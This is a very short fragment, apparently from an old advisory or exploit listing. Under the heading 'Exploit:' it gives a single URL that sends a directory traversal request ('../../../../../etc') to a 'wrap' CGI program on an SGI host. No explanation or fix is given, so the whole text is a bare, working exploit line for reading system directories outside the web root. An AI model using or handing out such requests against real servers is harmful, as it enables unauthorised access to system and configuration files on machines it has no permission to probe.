Exploit:

    http://sgi.victim/cgi-bin/wrap?/../../../../../etc